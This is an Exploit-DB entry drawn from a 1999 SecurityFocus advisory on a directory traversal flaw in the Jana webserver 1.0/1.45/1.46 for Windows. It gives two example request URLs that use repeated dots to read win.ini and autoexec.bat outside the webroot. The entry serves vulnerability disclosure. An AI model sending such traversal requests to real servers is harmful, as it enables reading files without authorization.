T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal

EDB-ID:

19540




Platform:

Windows

Date:

1999-10-08


source: https://www.securityfocus.com/bid/699/info


The Jana webserver is susceptible to directory traversal attacks using multiple dots in the URL. If the request is made in specific formats, the server will send out files outside of the intended webroot. 


http ://target/./.././.././.././win.ini
or
http ://target/....../autoexec.bat